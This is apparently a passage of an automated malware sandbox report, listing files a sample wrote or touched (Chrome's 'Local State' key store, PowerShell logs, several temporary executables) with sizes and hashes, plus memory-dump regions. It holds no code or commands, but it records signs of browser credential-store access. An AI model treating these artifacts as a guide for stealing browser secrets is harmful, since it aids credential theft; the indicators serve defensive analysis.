e9d2fc7ba82e3bc4fd55af909b450522

SHA1
71c2a4838c79402dc4e18d76cd8882746bda1777

SHA256
eb116bfa9a35cc536d3fc99a42f3d216107df56b91093c4e2575a7d2efc984f7

SHA512
15f4dfb1862e321e295510d3937c3437346a855138ae27be1ab964acf8a3d0e1b85e9e26ec01807bec9397b36487506c56d04d40796d919964a72ad744b59a7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
a5bf062e347e85b82d12f1c7bf2d870a

SHA1
1f56716ff18aed72ada9aaeb7444487fba0a5d47

SHA256
fafeca3782011ee96b968105f739acb1e423902ca7a0bdc764a39a3227ea35e4

SHA512
60bfea0b884050e8217246b1c51b21610483f03eda0962c555fa84806fe790b8f71c3e6575ca67ff44b33798126e07f2acad3d08f59807656e2c0a69c969d087

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
daf69bf01b7a12d9738c5043d36587b8

SHA1
9906b07b610636e0137a34471acc29bf2b10a4ba

SHA256
063843da32edbd4bdd32981317e8dd67fbee71d4fe0ae8a651dbf0542c149e0d

SHA512
43b136fdaab0f22f507c4d0b7cdf9c38da4e4a35f77ed09a17710d84905c079e3beb30b5886641cbef6b352a941da8f8194a7dbf65e05e86bbb83ef9fa9ea39c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_upqhjflp.wy4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3160_1697987465\CRX_INSTALL\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3160_1697987465\b4226876-92c3-4901-a352-2f017c5c3ddc.tmp

Filesize
150KB

MD5
14937b985303ecce4196154a24fc369a

SHA1
ecfe89e11a8d08ce0c8745ff5735d5edad683730

SHA256
71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe

Filesize
76KB

MD5
0fee09301324f18d3dd2831a03294a68

SHA1
60a64ce1a45eec70c891ea4e64f7ebf536b1b58f

SHA256
65a3e8e51550a616e1804c6dc4002ffb4a70bb7d38edaf50bc582a7f80a41345

SHA512
a22439aabceb28e3e568587cca232e02abb7712871e68c2fa3bacdaa8b874113e40e9d584adad79f1bd006cc7c752326358e1d7cdc3412f35cdcab7665b7fe37

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe

Filesize
699KB

MD5
81dd862410af80c9d2717af912778332

SHA1
8f1df476f58441db5973ccfdc211c8680808ffe1

SHA256
60e76eda46185d1d2e9463d15e31d4c87eb03535d368cc3471c55992bc99ad5f

SHA512
8dd014b91fb1e2122d2e4da444db78dd551513c500d447bb1e94ceb7f2f8d45223a8a706e2156102f8c8850d2bb02ae6b8ea0c9282abd7baaa2c84130112af15

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe

Filesize
2.4MB

MD5
9729d33f5cc788e9c1930bcc968acffa

SHA1
68c662875f7b805dd6f246919d406c8d92158073

SHA256
3711a334cb3c6e2a92461067f2d7db2946e9b139f1517b214bc929ba42a86aae

SHA512
af12beee6da79e5498eb292eb4a122667bf5dcdf840def97a5476adb31e0701a2aa0585b4266547bb4307c3524c7f9733dbf32f2a87c87b33fadb4bb1ecd0c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe

Filesize
64KB

MD5
441ebfc2dbc56ad77fbb05854e6b73d7

SHA1
3eb5238cf73ca845a38be0f2e01f254093918e14

SHA256
b97733c8926c8186363f74a875b92d7749bb06f2edc94280322d6f5b9af22798

SHA512
2b29382dcc57a23f349e96b28f469f8914c768155d17f5eaf70f70e53d7de7b5fdac57612c4c8a916857b6171c290884defa60d289c41b799aafd0122fb21763

Download Submit
memory/1132-9-0x000000001D7A0000-0x000000001D7AC000-memory.dmp

Filesize
48KB

Download
memory/1132-538-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/1132-82-0x0000000001560000-0x000000000156E000-memory.dmp

Filesize
56KB

Download
memory/1132-83-0x00000000014B0000-0x00000000014BA000-memory.dmp

Filesize
40KB

Download
memory/1132-94-0x00000000016F0000-0x00000000016FA000-memory.dmp

Filesize
40KB

Download
memory/1132-0-0x00007FFF1D2C3000-0x00007FFF1D2C5000-memory.dmp

Filesize
8KB

Download
memory/1132-1-0x0000000000560000-0x0000000000570000-memory.dmp

Filesize
64KB

Download
memory/1132-2-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/1132-3-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/1132-6-0x00007FFF1D2C3000-0x00007FFF1D2C5000-memory.dmp

Filesize
8KB

Download
memory/1132-7-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/1132-78-0x0000000001480000-0x0000000001490000-memory.dmp

Filesize
64KB

Download
memory/1132-8-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/1616-47-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/1616-46-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/3248-12-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/3248-11-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/3248-13-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/3248-19-0x000001DDE0600000-0x000001DDE0622000-memory.dmp

Filesize
136KB

Download
memory/3248-28-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

Filesize
10.8MB

Download
memory/3420-27-0x0000000000400000-0x0000000000545000-memory.dmp

Filesize
1.3MB

Download
memory/3420-29-0x0000000000400000-0x0000000000545000-memory.dmp

Filesize
1.3MB

Download
memory/3420-30-0x0000000000400000-0x0000000000545000-memory.dmp

Filesize
1.3MB

Download
memory/3420-31-0x0000000000400000-0x0000000000545000-memory.dmp

Filesize
1.3MB

Download